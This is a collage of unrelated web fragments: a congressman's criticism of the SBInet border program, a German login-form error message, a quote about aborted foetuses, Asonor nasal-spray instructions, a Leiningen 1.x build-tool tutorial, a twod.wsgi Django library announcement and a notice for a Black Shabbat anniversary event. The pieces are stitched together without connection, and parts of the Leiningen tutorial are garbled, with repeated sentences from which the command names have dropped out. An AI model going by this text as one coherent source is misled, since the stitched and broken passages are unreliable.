Rep. Bennie Thompson , Mississippi Democrat and chairman of the House Homeland Security Committee , said that SBInet , since its inception “ has been a grave and expensive disappointment .
“ Today ’s announcement is recognition that this troubled program needs better management and stronger oversight , ” he said .
“ We are tired of listening to stories about faulty cameras , poor tower stability and overly sensitive sensors which have led to failed testing . ”
Sign up for Daily Newsletters Manage Newsletters
Copyright © 2020 The Washington Times , LLC .
Click here for reprint permission .
Mit ZDF - Konto anmelden .
Bitte fülle alle Pflichtfelder mit * aus .
Diese E - Mail - Adresse scheint nicht korrekt zu sein – sie muss ein @ beinhalten und eine existierende Domain ( z.B. zdf.de ) haben .
Zu dieser E - Mail - Adresse ist kein ZDF - Konto vorhanden oder das angegebene Passwort ist falsch .
Zu dieser E - Mail - Adresse ist kein ZDF - Konto vorhanden oder das angegebene Passwort ist falsch .
" If the aborted foetus , in a voluntary or accidental way , is alive - also if it is at the limit of survival , at the age limit - the doctor is in the presence of a foetus that , because it is strong or because the dates were not properly calculated , fortunately , is living , " he said .
One should use Asonor every evening before going to bed .
Please avoid eating , drinking or brushing your teeth after taking Asonor , as this will reduce the effectiveness of the product .
Tilt your head back and pump into each nostril until you can feel the solution in your throat .
Usually , 4 to 6 pumps in each nostril are sufficient .
The liquid solution should not remain in the nose , as the effect takes place once it can be felt in the throat .
The pump delivery system has been designed to work in any direction for easy application and deliver a “ jet - stream ” of the solution rather than a spray or atomization ( which other nose drops products use ) to avoid the solution staying in the nose .
Generally , Asonor will be effective from the first night , but in rare cases the effect will not take place for up to 14 days after beginning of use .
See the Asonor how - to - use Video :
This article describes the Leiningen tool ( version 1.x ) for building of projects , written in Clojure .
What is Leiningen ?
Leiningen is a tool for building of code , written in Clojure .
Leiningen is much simpler comparing with Maven and allows to define project 's configuration using Clojure .
Leiningen uses external tools and libraries to resolve dependencies and build a code , so it 's pretty small .
This tool is getting more popularity between Clojure developers — it 's extensible by using additional modules ( plugins ) , such as plugin for compilation of Java code , and many others .
Out of box Leiningen implements basic tasks — compilation of code , testing , creation of package , installation , etc .
Besides this , it also provides basic support for work with Maven , so you can use packages , built by this tool in other projects .
Installation
Leiningen 's installation procedures for Unix - like OSes and for MS Windows are slightly different .
Installation on Unix is quite easy — you just need to download lein script , make it executable , copy to directory , listed in PATH , and execute lein self - install command .
During execution of this command , Leiningen will download and install all packages , that are needed to its work .
To install Leiningen on MS Windows you need to download lein - win32.zip file from project 's page .
This file contains all necessary programs , so you can unzip it into any directory , add this directory into search path , perform lein self - install command , and start to work with Leiningen .
Structure of Leiningen 's project
Leiningen uses fixed structure of project — in the root directory of the project you need to have the project.clj file , that contains project 's definition .
The only necessary component of the definition is defproject —
Clojure 's macro , that is expanded into set of build instructions .
project.clj can also include other code , written in Clojure , that will executed during build process .
Project 's source code should be stored in src directory , tests — in test directory , and additional resources , used by project — in resources directory .
The lib directory is used to store libraries , used by project — they are copied there with the lein deps command .
List of libraries is calculated using information about dependencies , declared in project .
If you want to use library , that is n't stored in one of the Maven 's repositories , then you can just copy this library into lib directory , and it will available to your project .
But names of directories are n't hard - coded — you can use defproject 's options to change their values :
: source - path name of directory with project 's source code ( by default — src ) ; : compile - path name of directory for resulting Java classes ( by default — classes / ) ; : resources - path name of directory with project 's resources ( by default — resources / ) ; : test - path name of directory with test 's source code ( by default — test / ) ; : library - path name of directory , where libraries are stored ( by default — lib / ) .
You can also add additional information to project 's definition — description ( the : description option ) and link to project 's home page ( the :url option ) .
The fastest way to create a new project is to use lein new command , that accepts one required argument — name of the project .
This command will create a new directory with name of the project , and will create inside it the project.clj file with declaration of the project ( including dependencies on Clojure and clojure - contrib ) , the README file with template of project 's description , and two directories — src and test for source code & tests .
Now you can start to work with you project .
Project 's example
Let look to simple project specified in project.clj with following code ( full code of this project you can find at github ) :
( defproject test - project " 1.0 - SNAPSHOT " : description " A test project . " :url " http://my-cool-project.com " : dependencies [ [org.clojure/clojure " 1.1.0 " ] [ org.clojure/clojure-contrib " 1.1.0 " ] ] : dev-dependencies [ [ swank - clojure " 1.2.0 " ] ] )
We define a project test - project with dependencies on Clojure and clojure - contrib libraries , and also have additional dependency on library , that we 'll use during development — swank - clojure .
In the src directory there is only one file — simple.clj , that declares namespace simple with following code inside :
( ns simple ) ( defn hello ( [ ]
" Hello world ! " ) ( [ name ] ( str " Hello " name " ! " ) ) )
In the test directory we have file simple_test.clj , that contains test for simple .
We 're using standard library clojure . test to implement test .
Test 's source code looks following way :
( ns simple - test ( :use clojure.test ) ( :use simple ) ) ( deftest simple - test ( is ( = ( hello ) " Hello world ! " ) ) ( is ( = ( hello " test " ) " Hello test ! " ) ) )
This is complete project , and we could execute any Leiningen 's command for it .
How to specify dependencies
One of important parts of defproject is declaration of dependencies on external libraries .
For code , written in Clojure , main dependency is Clojure itself , as this shown in example above .
There are different types of dependencies and different project options for them :
: dependencies option standard dependencies — for libraries , that are used in your code ; : dev-dependencies option dependencies for libraries , that are used during development .
For example , dependency on swank - clojure , Leiningen 's plugins , etc .
Besides this , exists native - deps plugin , that implements support for dependencies on platform - dependent libraries ( native libraries ) .
Here is example of use of this plugin .
Each of these options is a vector , where each element is another vector , holding description of concrete library .
This description consists from three elements ( you already had seen these descriptions in project 's example ) :
symbol , that defines name of library ( combination of group name & name of library , same as in Maven ) , for example , org.clojure / clojure ;
; string , that defines version of library .
To specify version of concrete package , you just write version as normal string , " 1.1.0 " or " 1.2.0 - master - SNAPSHOT " , for example .
But you can also list several " supported " versions , if you specify version as vector with values , separated by comma , " [ 1.1,1.2-SNAPSHOT ] " , for example ;
or , for example .
But you can also list several " supported " versions , if you specify version as vector with values , separated by comma , , for example ; options ( optional ) could be used to adjust dependencies , make them more accurate .
For example , you can exclude some libraries from dependencies using the : exclusions option .
Here is example of excluding of some not necessary dependencies for log4j library :
[ log4j " 1.2.15 " : exclusions [ javax.mail/ mail javax.jms/jms com.sun.jdmk/jmxtools com.sun.jmx/jmxri ] ]
Repositories
By default Leiningen uses three repository :
Maven 's standard repository ;
repository with Clojure 's daily builds ;
the Clojars repository , that is used to host libraries , written in Clojure .
Besides this , user can specify additional repositories with : repositories option .
This option take one parameter — map with names and URLs of repositories .
For example , we can add repository of Apache project with following code :
( defproject test2 " 1.0.0 - SNAPSHOT " : dependencies [....] : repositories { " apache - releases " " http://repository.apache.org/content/repositories/releases/ " } )
Work with Leiningen
Typical workflow when you use Leiningen looks following way :
you create a project ( lein new ) , define dependencies on external libraries and download them with lein deps command ( you need to run it after each change of dependencies ) ;
) , define dependencies on external libraries and download them with command ( you need to run it after each change of dependencies ) ; you write your code , periodically running lein compile , lein test , and may be using lein repl , lein swank or lein nailgun ( depending on your personal preferences ) for interactive development ;
, , and may be using , or ( depending on your personal preferences ) for interactive development ; if you develop a library , that you plan to use in other projects , then you can install it into Maven 's local repository with lein install command , or you can upload it to Clojars ( with scp , as suggested in documentation , or by using the lein - clojars plugin ) ;
command , or you can upload it to Clojars ( with , as suggested in documentation , or by using the plugin ) ; if you develop a program for end - user , then you can pack your code into package with lein jar command ( only your code , without dependencies ) , or with lein uberjar , with all dependencies included into package — it 's much easier to distribute such packages to end users .
This process is pretty simple and you repeat it until your code is complete :-)
Basic Leiningen 's commands
List of Leiningen 's commands is n't fixed — plugins could add new commands to it .
In basic configuration , Leiningen implements following commands , that could be run as lein command [ options ] :
help [ command ] shows help on Leiningen 's usage .
If you specify name of the command after help , then description of command will shown ( except repl ) new project_name [ options ] creates a new empty project ; deps download ( if necessary ) and copies all dependencies into lib/ directory .
This command should executed after each change in dependencies ! ; compile performs compilation of code ( AOT , ahead - of - time ) into Java classes .
These classes are stored in classes / directory .
User can control which namespaces should be compiled — you can use : namespaces option to specify a list of namespaces to compile ; test [ list_of_namespace ] runs tests from all ( or only from specified ) namespaces ; jar creates a package with your code ; uberjar create independent package with your code and all dependencies included into it ( it 's much easier to distribute such packages ) .
If you will run this package with java - jar ... then entry point will namespace , specified in : main option , specified defproject ; pom creates pom.xml file , that contains description of project .
This file is needed if you plan to use your package in another project ; install installs package into Maven 's local repository ; clean deletes all files , created during build ( including libraries from lib / directory ) ; repl runs REPL with correctly specified classpath — it includes libraries from lib / directory , and also directories src / and classes / .
During start lein automatically detects presence of jline library , and uses it , so you 'll have command history , etc .
Additional commands
Additional commands are implemented by plugins , that are used to extend Leiningen 's functionality .
There are many popular plugins for Leiningen , and you can find short description of many of them in following blog posting .
For example , this are plugins for running of Swank and Nailgun servers , that are implementing interactive work from Emacs or Vim .
If you run these servers , then they are using all necessary dependencies , so you will work in the same environment , as your program .
To use Swank server you need to add dependency on swank - clojure in : dev- dependencies option , and after this you could use lein swank command .
After execution of this command you 'll get Swank server , running on port 4005 and you can connect to it with Emacs ' slime - connect command .
And if you prefer to use Vim editor , then you need to add dependency on lein - nailgun plugin ( more about work with Nailgun you can read on vimclojure 's site ) .
Extending Leiningen 's functionality
Leiningen is extensible — if necessary , you can add your own commands .
To do this you need to create a project , in which exists leiningen .
command_name namespace , containing implementation of your command as a function with name command_name .
This function receives project 's object as an argument .
More detailed information on writing plugins you can find in following blog post .
One of example of plugins for Leiningen is the lein - swank plugin , that implements support for Swank server — you can find it in Leiningen 's repository with source code .
There are several plugins for Leiningen in Clojars repository .
These plugins implement different functionality — automatic uploading of code into Clojars repository , building of Java source code , etc .
Names of these plugins usually starting with lein- , that you can use in search .
To use these plugins in your project , you need to add them into development dependencies ( the : dev- dependencies option ) .
Conclusion
I hope , that this article helps you in your work with Leiningen .
If you have questions you can write me e-mail or leave a comment on site — I 'll try to answer on all of them .
We are very pleased to announce the first alpha-release of twod.wsgi , a library to make WSGI a first - class citizen in Django applications .
twod.wsgi allows Django developers to take advantage of the huge array of existing WSGI software , to integrate 3rd party components which suit your needs or just to improve things which are not within the scope of a Web application framework .
It ships with a PasteDeploy application factory ( which gives the enterprise some of what it needs ) and full - featured request objects extended by [ WebOb ] ( http://pythonpaste.org/webob/.
It also gives you the ability to serve WSGI applications inside Django , so you can filter the requests they get and / or the responses they return ( e.g. , to implement Single Sign - On mechanisms ) .
And there ’s more !
For example , if you wanted to integrate your authentication mechanisms with your Trac application , you could do it in 11 lines of code :
from django .
shortcuts import redirect from django.conf import settings from twod.wsgi import call_wsgi_app from trac.web.main import dispatch_request as trac_app def make_trac ( request , path_info ) : if path_info .
startswith ( " / login " ) : return redirect ( request .
script_name + " / login " ) elif path_info .
startswith ( " / logout " ) : return redirect ( request .
script_name + " / logout " ) request .
environ [ ' trac.env_path ' ] = settings .
TRAC_PATH return call_wsgi_app ( trac_app , request , path_info )
Do n’t be fooled by the “ first alpha release ” :
It ’s rock - solid .
We ’ve been using it for months in our Web site and it ’s never ever failed .
It just means the API might change in a backwards incompatible way by the final release – Which is very unlikely given how simple it is .
It ’s also comprehensively documented and tested .
For all these reasons , we believe it ’s safe to say it ’s production ready .
Be warned , WSGI is very addictive !
If you like it , please support it .
Broadside was the code selected by the British army forces for the extensive operation carried out on June 29 , 1946 in the Land of Israel .
During the operation , which was named in Hebrew " Black Shabbat , " about 2,700 people were arrested , including some of the leaders of the Jewish community ( such as former Prime Minister Moshe Sharett , Rabbi Y. L. Fishman , former Ministers Dov Yosef and David Remez , and others ) , underground arms caches were uncovered and many weapons were confiscated .
Kibbutz Yagur suffered a particularly harsh blow .
Many of its members were arrested , the big defense weapon cache on its grounds was uncovered , and more than 300 rifles , 100 mortars , 78 pistols and a considerable amount of bullets were confiscated .
British machine gun carriers on their way to Kibbutz Yagur ( Photo : Courtesy of Kibbutz Yagur )
Painter Yaakov ( Yakush ) Zen from Kibbutz Ein Hahoresh was among the Hagana activists who were arrested in the raid .
In his painting album he perpetuated hard and colorful moments from the Latrun detention camp .
Some 60 years have passed , and the paintings are still alive , illustrating a story that caused a stir and a rebellion in the Jewish community .
A special event to mark the 60th anniversary of the Black Shabbat incidents will be held in Kibbutz Yagur on Thursday , June 29 .
The event , sponsored by the Association of Hagana Veterans , will begin at 3:30 p.m .
As part of the plan , a tour of the big weapons cache , the exhibition " community under siege , " a lecture by Dr. Mordechai Naor and a short film .
Free entry .
For details please call : 04-98488100 .
